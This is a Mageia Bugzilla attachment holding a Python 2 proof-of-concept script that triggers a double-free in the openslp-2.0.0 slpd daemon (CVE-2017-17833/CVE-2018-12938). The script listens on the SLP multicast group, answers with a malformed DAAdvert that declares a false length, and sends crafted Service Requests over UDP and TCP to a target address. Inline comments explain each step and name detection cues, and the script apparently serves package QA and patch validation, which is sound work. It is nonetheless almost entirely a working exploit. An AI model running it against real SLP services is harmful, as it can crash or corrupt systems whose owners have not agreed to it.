Mageia Bugzilla – Attachment 10288 Details for
Bug 23310
openslp new security issue CVE-2017-17833
Proof of concept trigger script for CVE-2018-12938/CVE-2017-17833
openslp-2.0.0-double-free-poc.py (text/plain), 3.47 KB, created by
Len Lawrence
on 2018-07-21 18:45:26 CEST
Description:
Proof of concept trigger script for CVE-2018-12938/CVE-2017-17833
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2018-07-21 18:45:26 CEST
Size:
3.47 KB
# Proof-of-concept trigger for the openslp-2.0.0 slpd double-free, as described
# by the script's own banner. Written for Python 2 (print statements).
#
# Flow, as written below:
#   1. Join the SLP multicast group 239.255.255.253 on UDP/427 and wait for a
#      datagram (the banner says to start this script before launching slpd).
#   2. Answer the sender with the fixed payload `abuf`.
#   3. Send three fixed SLPv2 requests: UDP from loopback, UDP to the multicast
#      group (followed by a second `abuf` reply), then TCP to targetIp:427.
#
# Every recvfrom() blocks with no timeout, so the script hangs if no datagram
# arrives. It prints "[+] Done!" unconditionally after the final send and never
# checks whether slpd is still running; when validating a patched package, the
# daemon's state and logs have to be inspected separately.

# os and sys are imported but not used anywhere below.
import os
import sys
import struct
import socket

# Used only for the final TCP connect and in log messages; the UDP traffic goes
# to 127.0.0.1 and to the multicast group.
targetIp = "192.168.1.3"

# Fixed reply payload. Header bytes read as SLPv2: version 2, function-ID 8
# (DAAdvert in RFC 2608), XID 0x5827, language tag "en". The 3-byte length
# field is 0xffffff although the datagram is only a few dozen bytes; a declared
# length that disagrees with the datagram size is something a parser check or
# network sensor can flag.
abuf = ("\x02\x08\xff\xff\xff\x00\x00\x00\x00\x00\x58\x27\x00\x02\x65\x6e" +
        "\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00")

# UDP socket bound to the SLP multicast group address on port 427 and joined to
# that group. Binding a port below 1024 normally needs elevated privileges.
mcastserversock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
mcastserversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
mcastserversock.bind(('239.255.255.253', 427))
mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY)
mcastserversock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

print "Proof-of-concept heap massager and double-free trigger for openslp-2.0.0 slpd\nRun this script before launching slpd and remember to update targetIp variable."
print "[-] Waiting for multicast service request from slpd..."
# Blocks until any datagram arrives on the group socket; the sender is not
# checked before abuf is sent back to it.
data, addr = mcastserversock.recvfrom(1024)
print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..."
mcastserversock.sendto(abuf, (addr[0], addr[1]))

# Second UDP socket on loopback with an ephemeral source port.
localhostsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
localhostsock.bind(('127.0.0.1', 0))
print "[-] Sending first Service Request to 127.0.0.1:427 from 127.0.0.1:" + str(localhostsock.getsockname()[1]) + "..."

# SLPv2 function-ID 1 (Service Request in RFC 2608), XID 0x660b, language "en".
# The ASCII bytes spell the service type "service:directory-agent".
buf = ("\x02\x01\x00\x00\x31\x00\x00\x00\x00\x00\x66\x0b\x00\x02\x65\x6e" +
       "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
       "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x00\x00\x00\x00" +
       "\x00")

localhostsock.sendto(buf, ('127.0.0.1', 427))
print "[-] Waiting for response..."
# Blocks until something answers on the loopback socket.
data, addr = localhostsock.recvfrom(1024)
print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1])

# Third UDP socket, bound to all interfaces and also joined to the SLP group.
clientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
clientsock.bind(('0.0.0.0', 0))
print "[-] Sending packet to (multicast) 239.255.255.253:427 from " + targetIp + ":" + str(clientsock.getsockname()[1]) + "..."
mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY)
clientsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

# Same Service Request shape with XID 0x660c, the flags field set to 0x2000
# (the multicast-request flag in RFC 2608) and the scope string "DEFAULT".
buf = ("\x02\x01\x00\x00\x38\x20\x00\x00\x00\x00\x66\x0c\x00\x02\x65\x6e" +
       "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
       "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" +
       "\x41\x55\x4c\x54\x00\x00\x00\x00")

clientsock.sendto(buf, ('239.255.255.253', 427))

# Wait for the next datagram on the group socket and answer its sender with
# abuf a second time.
data, addr = mcastserversock.recvfrom(1024)
print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..."
mcastserversock.sendto(abuf, (addr[0], addr[1]))

clientsock.close()
# data/addr here are still the values from the mcastserversock.recvfrom() above.
print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1])

# Final Service Request: XID 0x660d, flags cleared, scope "DEFAULT"; sent over
# TCP rather than UDP.
buf = ("\x02\x01\x00\x00\x38\x00\x00\x00\x00\x00\x66\x0d\x00\x02\x65\x6e" +
       "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
       "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" +
       "\x41\x55\x4c\x54\x00\x00\x00\x00")

# mcastserversock, localhostsock and tcpclientsock are never closed explicitly;
# they are released when the interpreter exits.
tcpclientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[-] Connecting to " + targetIp + ":427..."
tcpclientsock.connect((targetIp, 427))
print "[+] Connected. Sending..."
tcpclientsock.send(buf)
print "[-] Sent packet to " + targetIp + ":427 from " + targetIp + ":" + str(tcpclientsock.getsockname()[1]) + "...\n[+] Done!"